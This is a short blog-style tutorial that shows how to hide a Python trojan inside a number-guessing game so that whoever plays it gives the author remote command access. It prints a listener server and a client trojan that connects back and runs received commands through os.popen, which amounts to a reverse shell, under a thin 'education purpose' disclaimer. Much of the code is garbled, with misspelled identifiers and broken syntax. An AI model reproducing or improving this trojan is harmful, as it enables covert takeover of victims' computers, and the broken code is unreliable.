Ads terra script

Mini hacking project in python

We will create a game and bind virus Trojan in it. So the victim who plays the game will be effected by virus in his PC.
In this blog I will guide you how you can insert a virus (trojan) in someone's computer.
Well basically there are three parts of this content.
The first is (coding the server).
The second is (coding the game).
The third is (coding the trojan).

import random
import os
import socket as socket
import threading
Enter this code first in your
Python IDE

Step 1: Coding the server
import socket
HOST "<Host_ip>" ayour IP ADDRESS
PORT 9898 #destred part
5Ocket. socket ( socket AF_INET, 5ocket.SOCK_STREAM)
server.bind( (HOST, PORT))
client,address = server. accept()
while True:
print( fConnected to {address")
Cmd input = input("enter a command!")
client.send( cmd input.encode( utf-8'))
print (client.recv(1024).decode( 'utf-8'))

Step 2: Coding the game
def game( ):
number = random.randint(0, 1000)
tries = 1
done False
while not done :
guess int (input("Enter the guess: \n"))
1T guess number:
done =True
print ("What a Guess, you Won!")
tries += 1
if guess > number
print ("The actual number is smaller!")
print ("The actual number is larger!")
print (f"You needed {tries} tries!")

Step 3: Coding the virus Trojan
def trojan( )
HOST <target tp>
PORT 9890
cltent socket.socket( socket.AF_ INET, socket.soCK_STRE
cltent.coannect( (HOST, PORT))
cmd mode - False
while True:
server_commanid clitent.recv(1824) .decode( 'utf-8*)
f server command cmd_on'
cmd mode = True
client.send("You now have terninal Access", encode( "utf-8* )
cont tnue
tf server_command Cmd_off'
cmd mode = False
if cmd mode:
0s.popen( server_command)
if server_conmand=hello':
print (Hello world!")
client.send( f"{server_command)} was executed successfully".encode( 'utf-8'))

Disclaimer:This project is created and shared solely for education purpose.It will install virus packages in the victims device..

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